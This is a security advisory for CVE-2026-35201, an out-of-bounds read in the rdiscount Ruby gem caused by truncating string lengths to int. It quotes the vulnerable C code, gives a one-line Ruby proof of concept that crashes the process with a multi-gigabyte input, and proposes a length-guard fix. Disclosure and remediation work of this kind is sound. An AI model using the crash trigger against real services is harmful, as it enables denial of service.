MEDIUM 5.9 RubyGems

rdiscount has an Out-of-bounds Read

GHSA-6r34-94wq-jhrc · CVE-2026-35201

Description

Summary

A signed length truncation bug causes an out-of-bounds read in the default Markdown parse path. Input lengths greater than INT_MAX are truncated to a signed int before entering the native parser, allowing the parser to read past the end of the supplied buffer and crash the process.

Details

In both public entry points:

  • ext/rdiscount.c:97
  • ext/rdiscount.c:136

RSTRING_LEN(text) is passed directly into mkd_string():

MMIOT *doc = mkd_string(RSTRING_PTR(text), RSTRING_LEN(text), flags);

mkd_string() accepts int len:

  • ext/mkdio.c:174
Document * mkd_string(const char *buf, int len, mkd_flag_t flags)
{
    struct string_stream about;

    about.data = buf;
    about.size = len;

    return populate((getc_func)__mkd_io_strget, &about, flags & INPUT_MASK);
}

The parser stores the remaining input length in a signed int:

  • ext/markdown.h:205
struct string_stream {
    const char *data;
    int   size;
};

The read loop stops only when size == 0:

  • ext/mkdio.c:161
int __mkd_io_strget(struct string_stream *in)
{
    if ( !in->size ) return EOF;

    --(in->size);

    return *(in->data)++;
}

If the Ruby string length exceeds INT_MAX, the value can truncate to a negative int. In that state, the parser continues incrementing data and reading past the end of the original Ruby string, causing an out-of-bounds read and native crash.
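The truncation can be illustrated in isolation. The following is a minimal sketch, not rdiscount code: narrow_len() and is_eof() are hypothetical names that model, respectively, passing a long length to an int parameter and the `!in->size` test in __mkd_io_strget(). It assumes a platform with a 32-bit int where out-of-range conversion wraps modulo 2^32, which is implementation-defined in C but is the behavior of common compilers.

```c
#include <assert.h>
#include <limits.h>

/* Hypothetical model: narrow a non-negative 64-bit length to int, as
 * happens when RSTRING_LEN(text) is passed to mkd_string()'s int len.
 * For len > INT_MAX the result is implementation-defined; the sketch
 * assumes the common wrap-modulo-2^32 behavior. */
static int narrow_len(long long len)
{
    assert(len >= 0);
    return (int)len;
}

/* Hypothetical model of the end-of-input test in the read function:
 * only an exact zero counts as EOF, so a negative count does not. */
static int is_eof(int size)
{
    return !size;
}
```

Under that assumption, the PoC length 2200000000 narrows to 2200000000 - 4294967296 = -2094967296, and is_eof() returns 0 for it, so the reader does not treat the stream as exhausted on the basis of the stored count.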

Affected APIs:

  • RDiscount.new(input).to_html
  • RDiscount.new(input).toc_content

PoC

Crash via to_html:

RUBYLIB=lib:ext ruby -e 'require "rdiscount"; n=2_200_000_000; s = "a" * n; warn "built=#{s.bytesize}"; RDiscount.new(s).to_html'

Result:

  • built=2200000000
  • Ruby terminates with [BUG] Segmentation fault
  • top control frame: CFUNC :to_html

The same crash occurs with toc_content.

Impact

This is an out-of-bounds read whose main consequence is a reliable denial of service. Impact is limited to deployments that parse attacker-controlled Markdown and permit multi-GB inputs.

Fix

Add a checked length guard before the mkd_string() call in both public entry points:

  • ext/rdiscount.c:97
  • ext/rdiscount.c:136
    Example:
VALUE text = rb_funcall(self, rb_intern("text"), 0);
VALUE buf = rb_str_buf_new(1024);
long text_len;

/* Verify the type before reading the length. */
Check_Type(text, T_STRING);
text_len = RSTRING_LEN(text);

/* Reject lengths that do not fit in mkd_string()'s int parameter. */
if (text_len > INT_MAX) {
    rb_raise(rb_eArgError, "markdown input too large");
}

MMIOT *doc = mkd_string(RSTRING_PTR(text), (int)text_len, flags);

The same guard should be applied in rb_rdiscount_toc_content() before its mkd_string() call.
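Because the guard is needed at two call sites, one option is to factor the range check into a small shared helper. The sketch below is only an illustration under that assumption: len_fits_int() is a hypothetical name, not an existing rdiscount or Ruby C API function, and it deliberately avoids any Ruby calls so it can be compiled and checked on its own.

```c
#include <assert.h>
#include <limits.h>
#include <stddef.h>

/* Hypothetical helper (not part of rdiscount): if len fits in a
 * non-negative int, store it in *out and return 1; otherwise leave
 * *out untouched and return 0. */
static int len_fits_int(long long len, int *out)
{
    assert(out != NULL);
    if (len < 0 || len > INT_MAX) {
        return 0;
    }
    *out = (int)len;
    return 1;
}
```

In the extension, each entry point could call such a helper with RSTRING_LEN(text) and raise the ArgumentError shown in the example when it returns 0, passing the stored int to mkd_string() otherwise.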
